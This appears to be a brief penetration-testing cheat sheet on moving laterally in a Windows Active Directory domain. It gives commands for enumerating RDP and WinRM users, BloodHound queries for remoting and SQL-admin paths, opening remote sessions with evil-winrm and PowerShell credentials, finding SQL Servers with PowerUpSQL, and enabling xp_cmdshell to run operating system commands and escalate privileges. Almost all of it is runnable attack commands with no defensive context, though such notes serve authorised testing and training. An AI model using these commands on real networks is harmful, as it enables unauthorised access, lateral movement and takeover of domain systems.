Privileged Access
Remote Desktop
# Enumerating the Remote Desktop Users Group
Get-NetLocalGroupMember -ComputerName MS01 -GroupName "Remote Desktop Users"
WinRM
# Enumerating the Remote Management Users Group
Get-NetLocalGroupMember -ComputerName MS01 -GroupName "Remote Management Users"
# Custom query to find WinRM users
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
Establishing WinRM Session from Windows
$password = ConvertTo-SecureString "pass" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("DOMAIN\eren", $password)
Enter-PSSession -ComputerName DB01 -Credential $cred
OR
# From Linux
evil-winrm -i ip -u eren
SQL Server Admin
# check for SQL Admin Rights
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
# hunt for SQL Server instances using PowerUpSQL.ps1
# Link : <https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet>
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
# authenticate against the remote SQL server host and run custom queries or operating system commands
Get-SQLQuery -Verbose -Instance "ip,1433" -username "domain\user" -password "SQL1234!" -query 'Select @@version'
OR
# From Linux using mssqlclient.py
mssqlclient.py DOMAIN/USER@ip -windows-auth
enable_xp_cmdshell  <-- enables xp_cmdshell so operating system commands can be run, privileges escalated, and further enumeration performed